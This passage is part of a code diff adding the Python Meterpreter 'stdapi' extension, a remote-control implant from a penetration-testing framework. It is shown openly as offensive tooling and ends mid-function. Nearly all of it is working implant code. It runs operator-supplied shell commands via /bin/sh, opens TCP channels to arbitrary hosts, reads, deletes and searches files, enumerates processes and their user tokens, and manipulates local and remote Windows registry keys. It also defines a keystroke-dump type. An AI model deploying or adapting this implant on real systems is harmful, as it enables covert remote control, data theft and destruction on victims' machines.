+TLV_TYPE_PROCESS_FLAGS =       TLV_META_TYPE_UINT    | 2304
+TLV_TYPE_PROCESS_ARGUMENTS =   TLV_META_TYPE_STRING  | 2305
+TLV_TYPE_PROCESS_ARCH =        TLV_META_TYPE_UINT    | 2306
+TLV_TYPE_PARENT_PID =          TLV_META_TYPE_UINT    | 2307
+
+TLV_TYPE_IMAGE_FILE =          TLV_META_TYPE_STRING  | 2400
+TLV_TYPE_IMAGE_FILE_PATH =     TLV_META_TYPE_STRING  | 2401
+TLV_TYPE_PROCEDURE_NAME =      TLV_META_TYPE_STRING  | 2402
+TLV_TYPE_PROCEDURE_ADDRESS =   TLV_META_TYPE_UINT    | 2403
+TLV_TYPE_IMAGE_BASE =          TLV_META_TYPE_UINT    | 2404
+TLV_TYPE_IMAGE_GROUP =         TLV_META_TYPE_GROUP   | 2405
+TLV_TYPE_IMAGE_NAME =          TLV_META_TYPE_STRING  | 2406
+
+TLV_TYPE_THREAD_ID =           TLV_META_TYPE_UINT    | 2500
+TLV_TYPE_THREAD_PERMS =        TLV_META_TYPE_UINT    | 2502
+TLV_TYPE_EXIT_CODE =           TLV_META_TYPE_UINT    | 2510
+TLV_TYPE_ENTRY_POINT =         TLV_META_TYPE_UINT    | 2511
+TLV_TYPE_ENTRY_PARAMETER =     TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_CREATION_FLAGS =      TLV_META_TYPE_UINT    | 2513
+
+TLV_TYPE_REGISTER_NAME =       TLV_META_TYPE_STRING  | 2540
+TLV_TYPE_REGISTER_SIZE =       TLV_META_TYPE_UINT    | 2541
+TLV_TYPE_REGISTER_VALUE_32 =   TLV_META_TYPE_UINT    | 2542
+TLV_TYPE_REGISTER =            TLV_META_TYPE_GROUP   | 2550
+
+##
+# Ui
+##
+TLV_TYPE_IDLE_TIME =           TLV_META_TYPE_UINT    | 3000
+TLV_TYPE_KEYS_DUMP =           TLV_META_TYPE_STRING  | 3001
+TLV_TYPE_DESKTOP =             TLV_META_TYPE_STRING  | 3002
+
+##
+# Event Log
+##
+TLV_TYPE_EVENT_SOURCENAME =    TLV_META_TYPE_STRING  | 4000
+TLV_TYPE_EVENT_HANDLE =        TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_NUMRECORDS =    TLV_META_TYPE_UINT    | 4002
+
+TLV_TYPE_EVENT_READFLAGS =     TLV_META_TYPE_UINT    | 4003
+TLV_TYPE_EVENT_RECORDOFFSET =  TLV_META_TYPE_UINT    | 4004
+
+TLV_TYPE_EVENT_RECORDNUMBER =  TLV_META_TYPE_UINT    | 4006
+TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT    | 4007
+TLV_TYPE_EVENT_TIMEWRITTEN =   TLV_META_TYPE_UINT    | 4008
+TLV_TYPE_EVENT_ID =            TLV_META_TYPE_UINT    | 4009
+TLV_TYPE_EVENT_TYPE =          TLV_META_TYPE_UINT    | 4010
+TLV_TYPE_EVENT_CATEGORY =      TLV_META_TYPE_UINT    | 4011
+TLV_TYPE_EVENT_STRING =        TLV_META_TYPE_STRING  | 4012
+TLV_TYPE_EVENT_DATA =          TLV_META_TYPE_RAW     | 4013
+
+##
+# Power
+##
+TLV_TYPE_POWER_FLAGS =         TLV_META_TYPE_UINT    | 4100
+TLV_TYPE_POWER_REASON =        TLV_META_TYPE_UINT    | 4101
+
+##
+# Sys
+##
+PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0)
+PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
+PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
+PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
+
+PROCESS_ARCH_UNKNOWN = 0
+PROCESS_ARCH_X86 = 1
+PROCESS_ARCH_X64 = 2
+PROCESS_ARCH_IA64 = 3
+
+##
+# Errors
+##
+ERROR_SUCCESS = 0
+# not defined in original C implementation
+ERROR_FAILURE = 1
+
+# Special return value to match up with Windows error codes for network
+# errors.
+ERROR_CONNECTION_ERROR = 10000
+
+WIN_AF_INET  = 2
+WIN_AF_INET6 = 23
+
+def get_stat_buffer(path):
+	si = os.stat(path)
+	rdev = 0
+	if hasattr(si, 'st_rdev'):
+		rdev = si.st_rdev
+	blksize = 0
+	if hasattr(si, 'st_blksize'):
+		blksize = si.st_blksize
+	blocks = 0
+	if hasattr(si, 'st_blocks'):
+		blocks = si.st_blocks
+	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
+	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
+	st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
+	st_buf += struct.pack('<II', blksize, blocks)
+	return st_buf
+
+def inet_pton(family, address):
+	if hasattr(socket, 'inet_pton'):
+		return socket.inet_pton(family, address)
+	elif has_windll:
+		WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
+		lpAddress = (ctypes.c_ubyte * 28)()
+		lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
+		if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
+			raise Exception('WSAStringToAddress failed')
+		if family == socket.AF_INET:
+			return ''.join(map(chr, lpAddress[4:8]))
+		elif family == socket.AF_INET6:
+			return ''.join(map(chr, lpAddress[8:24]))
+	raise Exception('no suitable inet_pton functionality is available')
+
+def resolve_host(hostname, family):
+	address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
+	family = address_info[0]
+	address = address_info[4][0]
+	return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
+
+def windll_GetNativeSystemInfo():
+	if not has_windll:
+		return None
+	sysinfo = SYSTEM_INFO()
+	ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
+	return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
+
+@meterpreter.register_function
+def channel_create_stdapi_fs_file(request, response):
+	fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
+	if fmode:
+		fmode = fmode['value']
+		fmode = fmode.replace('bb', 'b')
+	else:
+		fmode = 'rb'
+	file_h = open(fpath, fmode)
+	channel_id = meterpreter.add_channel(file_h)
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def channel_create_stdapi_net_tcp_client(request, response):
+	host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
+	port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
+	local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
+	local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)
+	retries = packet_get_tlv(request, TLV_TYPE_CONNECT_RETRIES).get('value', 1)
+	connected = False
+	for i in range(retries + 1):
+		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.settimeout(3.0)
+		if local_host.get('value') and local_port.get('value'):
+			sock.bind((local_host['value'], local_port['value']))
+		try:
+			sock.connect((host, port))
+			connected = True
+			break
+		except:
+			pass
+	if not connected:
+		return ERROR_CONNECTION_ERROR, response
+	channel_id = meterpreter.add_channel(sock)
+	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_config_getuid(request, response):
+	response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_config_sysinfo(request, response):
+	uname_info = platform.uname()
+	response += tlv_pack(TLV_TYPE_COMPUTER_NAME, uname_info[1])
+	response += tlv_pack(TLV_TYPE_OS_NAME, uname_info[0] + ' ' + uname_info[2] + ' ' + uname_info[3])
+	arch = uname_info[4]
+	if has_windll:
+		arch = windll_GetNativeSystemInfo()
+		if arch == PROCESS_ARCH_IA64:
+			arch = 'IA64'
+		elif arch == PROCESS_ARCH_X64:
+			arch = 'x86_64'
+		elif arch == PROCESS_ARCH_X86:
+			arch = 'x86'
+		else:
+			arch = uname_info[4]
+	response += tlv_pack(TLV_TYPE_ARCHITECTURE, arch)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_close(request, response):
+	proc_h_id = packet_get_tlv(request, TLV_TYPE_PROCESS_HANDLE)
+	if not proc_h_id:
+		return ERROR_SUCCESS, response
+	proc_h_id = proc_h_id['value']
+	proc_h = meterpreter.channels[proc_h_id]
+	proc_h.kill()
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_execute(request, response):
+	cmd = packet_get_tlv(request, TLV_TYPE_PROCESS_PATH)['value']
+	raw_args = packet_get_tlv(request, TLV_TYPE_PROCESS_ARGUMENTS)
+	if raw_args:
+		raw_args = raw_args['value']
+	else:
+		raw_args = ""
+	flags = packet_get_tlv(request, TLV_TYPE_PROCESS_FLAGS)['value']
+	if len(cmd) == 0:
+		return ERROR_FAILURE, response
+	if os.path.isfile('/bin/sh'):
+		args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
+	else:
+		args = [cmd]
+		args.extend(shlex.split(raw_args))
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
+		if has_pty:
+			master, slave = pty.openpty()
+			if has_termios:
+				settings = termios.tcgetattr(master)
+				settings[3] = settings[3] & ~termios.ECHO
+				termios.tcsetattr(master, termios.TCSADRAIN, settings)
+			proc_h = STDProcess(args, stdin=slave, stdout=slave, stderr=slave, bufsize=0)
+			proc_h.stdin = os.fdopen(master, 'wb')
+			proc_h.stdout = os.fdopen(master, 'rb')
+			proc_h.stderr = open(os.devnull, 'rb')
+		else:
+			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+		proc_h.start()
+	else:
+		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+	proc_h_id = meterpreter.add_process(proc_h)
+	response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
+	response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
+	if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
+		channel_id = meterpreter.add_channel(proc_h)
+		response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_getpid(request, response):
+	response += tlv_pack(TLV_TYPE_PID, os.getpid())
+	return ERROR_SUCCESS, response
+
+def stdapi_sys_process_get_processes_via_proc(request, response):
+	for pid in os.listdir('/proc'):
+		pgroup = ''
+		if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
+			continue
+		cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
+		status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
+		status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
+		status_data = filter(lambda x: len(x) == 2, status_data)
+		status = {}
+		for k, v in status_data:
+			status[k[:-1]] = v.strip()
+		ppid = status.get('PPid')
+		uid = status.get('Uid').split('\t', 1)[0]
+		if has_pwd:
+			uid = pwd.getpwuid(int(uid)).pw_name
+		if cmd:
+			pname = os.path.basename(cmd.split(' ', 1)[0])
+			ppath = cmd
+		else:
+			pname = '[' + status['Name'] + ']'
+			ppath = ''
+		pgroup += tlv_pack(TLV_TYPE_PID, int(pid))
+		if ppid:
+			pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(ppid))
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, uid)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pname)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ppath)
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
+def stdapi_sys_process_get_processes_via_ps(request, response):
+	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
+	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+	ps_output = proc_h.stdout.read()
+	ps_output = ps_output.split('\n')
+	ps_output.pop(0)
+	for process in ps_output:
+		process = process.split()
+		if len(process) < 4:
+			break
+		pgroup = ''
+		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, os.path.basename(process[3]))
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ' '.join(process[3:]))
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
+	return ERROR_SUCCESS, response
+
+def stdapi_sys_process_get_processes_via_windll(request, response):
+	TH32CS_SNAPPROCESS = 2
+	PROCESS_QUERY_INFORMATION = 0x0400
+	PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
+	PROCESS_VM_READ = 0x10
+	TOKEN_QUERY = 0x0008
+	TokenUser = 1
+	k32 = ctypes.windll.kernel32
+	pe32 = PROCESSENTRY32()
+	pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
+	proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
+	result = k32.Process32First(proc_snap, ctypes.byref(pe32))
+	if not result:
+		return ERROR_FAILURE, response
+	while result:
+		proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
+		if not proc_h:
+			proc_h = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pe32.th32ProcessID)
+		exe_path = (ctypes.c_char * 1024)()
+		success = False
+		if hasattr(ctypes.windll.psapi, 'GetModuleFileNameExA'):
+			success = ctypes.windll.psapi.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
+		elif hasattr(k32, 'GetModuleFileNameExA'):
+			success = k32.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
+		if not success and hasattr(k32, 'QueryFullProcessImageNameA'):
+			dw_sz = ctypes.c_uint32()
+			dw_sz.value = ctypes.sizeof(exe_path)
+			success = k32.QueryFullProcessImageNameA(proc_h, 0, exe_path, ctypes.byref(dw_sz))
+		if not success and hasattr(ctypes.windll.psapi, 'GetProcessImageFileNameA'):
+			success = ctypes.windll.psapi.GetProcessImageFileNameA(proc_h, exe_path, ctypes.sizeof(exe_path))
+		if success:
+			exe_path = ctypes.string_at(exe_path)
+		else:
+			exe_path = ''
+		complete_username = ''
+		tkn_h = ctypes.c_long()
+		tkn_len = ctypes.c_uint32()
+		if ctypes.windll.advapi32.OpenProcessToken(proc_h, TOKEN_QUERY, ctypes.byref(tkn_h)):
+			ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, None, 0, ctypes.byref(tkn_len))
+			buf = (ctypes.c_ubyte * tkn_len.value)()
+			if ctypes.windll.advapi32.GetTokenInformation(tkn_h, TokenUser, ctypes.byref(buf), ctypes.sizeof(buf), ctypes.byref(tkn_len)):
+				user_tkn = SID_AND_ATTRIBUTES()
+				ctypes.memmove(ctypes.byref(user_tkn), buf, ctypes.sizeof(user_tkn))
+				username = (ctypes.c_char * 512)()
+				domain = (ctypes.c_char * 512)()
+				u_len = ctypes.c_uint32()
+				u_len.value = ctypes.sizeof(username)
+				d_len = ctypes.c_uint32()
+				d_len.value = ctypes.sizeof(domain)
+				use = ctypes.c_ulong()
+				use.value = 0
+				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
+				complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
+			k32.CloseHandle(tkn_h)
+		parch = windll_GetNativeSystemInfo()
+		is_wow64 = ctypes.c_ubyte()
+		is_wow64.value = 0
+		if hasattr(k32, 'IsWow64Process'):
+			if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
+				if is_wow64.value:
+					parch = PROCESS_ARCH_X86
+		pgroup = ''
+		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
+		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
+		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pe32.szExeFile)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, exe_path)
+		pgroup += tlv_pack(TLV_TYPE_PROCESS_ARCH, parch)
+		response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
+		result = k32.Process32Next(proc_snap, ctypes.byref(pe32))
+		k32.CloseHandle(proc_h)
+	k32.CloseHandle(proc_snap)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_sys_process_get_processes(request, response):
+	if os.path.isdir('/proc'):
+		return stdapi_sys_process_get_processes_via_proc(request, response)
+	elif has_windll:
+		return stdapi_sys_process_get_processes_via_windll(request, response)
+	else:
+		return stdapi_sys_process_get_processes_via_ps(request, response)
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function
+def stdapi_fs_chdir(request, response):
+	wd = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	os.chdir(wd)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_delete(request, response):
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	os.unlink(file_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_delete_dir(request, response):
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	if os.path.islink(dir_path):
+		del_func = os.unlink
+	else:
+		del_func = shutil.rmtree
+	del_func(dir_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_delete_file(request, response):
+	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.unlink(file_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_file_expand_path(request, response):
+	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	if has_windll:
+		path_out = (ctypes.c_char * 4096)()
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = ''.join(path_out)[:path_out_len]
+	elif path_tlv == '%COMSPEC%':
+		result = '/bin/sh'
+	elif path_tlv in ['%TEMP%', '%TMP%']:
+		result = '/tmp'
+	else:
+		result = os.getenv(path_tlv, path_tlv)
+	if not result:
+		return ERROR_FAILURE, response
+	response += tlv_pack(TLV_TYPE_FILE_PATH, result)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_file_move(request, response):
+	oldname = packet_get_tlv(request, TLV_TYPE_FILE_NAME)['value']
+	newname = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	os.rename(oldname, newname)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_getwd(request, response):
+	response += tlv_pack(TLV_TYPE_DIRECTORY_PATH, os.getcwd())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_ls(request, response):
+	path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	path = os.path.abspath(path)
+	contents = os.listdir(path)
+	contents.sort()
+	for x in contents:
+		y = os.path.join(path, x)
+		response += tlv_pack(TLV_TYPE_FILE_NAME, x)
+		response += tlv_pack(TLV_TYPE_FILE_PATH, y)
+		response += tlv_pack(TLV_TYPE_STAT_BUF, get_stat_buffer(y))
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_md5(request, response):
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
+		import md5
+		m = md5.new()
+	else:
+		import hashlib
+		m = hashlib.md5()
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	m.update(open(path, 'rb').read())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_mkdir(request, response):
+	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
+	os.mkdir(dir_path)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_search(request, response):
+	search_root = packet_get_tlv(request, TLV_TYPE_SEARCH_ROOT).get('value', '.')
+	search_root = ('' or '.') # sometimes it's an empty string
+	glob = packet_get_tlv(request, TLV_TYPE_SEARCH_GLOB)['value']
+	recurse = packet_get_tlv(request, TLV_TYPE_SEARCH_RECURSE)['value']
+	if recurse:
+		for root, dirs, files in os.walk(search_root):
+			for f in filter(lambda f: fnmatch.fnmatch(f, glob), files):
+				file_tlv  = ''
+				file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, root)
+				file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
+				file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(root, f)).st_size)
+				response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
+	else:
+		for f in filter(lambda f: fnmatch.fnmatch(f, glob), os.listdir(search_root)):
+			file_tlv  = ''
+			file_tlv += tlv_pack(TLV_TYPE_FILE_PATH, search_root)
+			file_tlv += tlv_pack(TLV_TYPE_FILE_NAME, f)
+			file_tlv += tlv_pack(TLV_TYPE_FILE_SIZE, os.stat(os.path.join(search_root, f)).st_size)
+			response += tlv_pack(TLV_TYPE_SEARCH_RESULTS, file_tlv)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_separator(request, response):
+	response += tlv_pack(TLV_TYPE_STRING, os.sep)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_sha1(request, response):
+	if sys.version_info[0] == 2 and sys.version_info[1] < 5:
+		import sha1
+		m = sha1.new()
+	else:
+		import hashlib
+		m = hashlib.sha1()
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	m.update(open(path, 'rb').read())
+	response += tlv_pack(TLV_TYPE_FILE_NAME, m.digest())
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_fs_stat(request, response):
+	path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
+	st_buf = get_stat_buffer(path)
+	response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_net_resolve_host(request, response):
+	hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
+	family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
+	if family == WIN_AF_INET:
+		family = socket.AF_INET
+	elif family == WIN_AF_INET6:
+		family = socket.AF_INET6
+	else:
+		raise Exception('invalid family')
+	result = resolve_host(hostname, family)
+	response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
+	response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_net_resolve_hosts(request, response):
+	family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
+	if family == WIN_AF_INET:
+		family = socket.AF_INET
+	elif family == WIN_AF_INET6:
+		family = socket.AF_INET6
+	else:
+		raise Exception('invalid family')
+	for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
+		hostname = hostname['value']
+		try:
+			result = resolve_host(hostname, family)
+		except socket.error:
+			result = {'family':family, 'packed_address':''}
+		response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
+		response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function
+def stdapi_net_socket_tcp_shutdown(request, response):
+	channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
+	channel = meterpreter.channels[channel_id]
+	channel.close()
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_close_key(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	result = ctypes.windll.advapi32.RegCloseKey(hkey)
+	return ERROR_SUCCESS, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_create_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
+	res_key = ctypes.c_void_p()
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_delete_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
+	if (flags & DELETE_KEY_FLAG_RECURSIVE):
+		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
+	else:
+		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_delete_value(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_enum_key(request, response):
+	ERROR_MORE_DATA = 0xea
+	ERROR_NO_MORE_ITEMS = 0x0103
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	name = (ctypes.c_char * 4096)()
+	index = 0
+	tries = 0
+	while True:
+		result = ctypes.windll.advapi32.RegEnumKeyA(hkey, index, name, ctypes.sizeof(name))
+		if result == ERROR_MORE_DATA:
+			if tries > 3:
+				break
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 2))
+			tries += 1
+			continue
+		elif result == ERROR_NO_MORE_ITEMS:
+			result = ERROR_SUCCESS
+			break
+		elif result != ERROR_SUCCESS:
+			break
+		tries = 0
+		response += tlv_pack(TLV_TYPE_KEY_NAME, ctypes.string_at(name))
+		index += 1
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_enum_value(request, response):
+	ERROR_MORE_DATA = 0xea
+	ERROR_NO_MORE_ITEMS = 0x0103
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	name = (ctypes.c_char * 4096)()
+	name_sz = ctypes.c_uint32()
+	index = 0
+	tries = 0
+	while True:
+		name_sz.value = ctypes.sizeof(name)
+		result = ctypes.windll.advapi32.RegEnumValueA(hkey, index, name, ctypes.byref(name_sz), None, None, None, None)
+		if result == ERROR_MORE_DATA:
+			if tries > 3:
+				break
+			name = (ctypes.c_char * (ctypes.sizeof(name) * 3))
+			tries += 1
+			continue
+		elif result == ERROR_NO_MORE_ITEMS:
+			result = ERROR_SUCCESS
+			break
+		elif result != ERROR_SUCCESS:
+			break
+		tries = 0
+		response += tlv_pack(TLV_TYPE_VALUE_NAME, ctypes.string_at(name))
+		index += 1
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_load_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)
+	sub_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)
+	file_name = packet_get_tlv(request, TLV_TYPE_FILE_PATH)
+	result = ctypes.windll.advapi32.RegLoadKeyA(root_key, sub_key, file_name)
+	return result, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_open_key(request, response):
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
+	handle_id = ctypes.c_void_p()
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_open_remote_key(request, response):
+	target_host = packet_get_tlv(request, TLV_TYPE_TARGET_HOST)['value']
+	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
+	result_key = ctypes.c_void_p()
+	result = ctypes.windll.advapi32.RegConnectRegistry(target_host, root_key, ctypes.byref(result_key))
+	if (result == ERROR_SUCCESS):
+		response += tlv_pack(TLV_TYPE_HKEY, result_key.value)
+		return ERROR_SUCCESS, response
+	return ERROR_FAILURE, response
+
+@meterpreter.register_function_windll
+def stdapi_registry_query_class(request, response):
+	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
+	value_data = (ctypes.c_char * 4096)()
+	value_data_sz = ctypes.c_uint32()
+	value_data_sz.value = ctypes.sizeof(value_data)
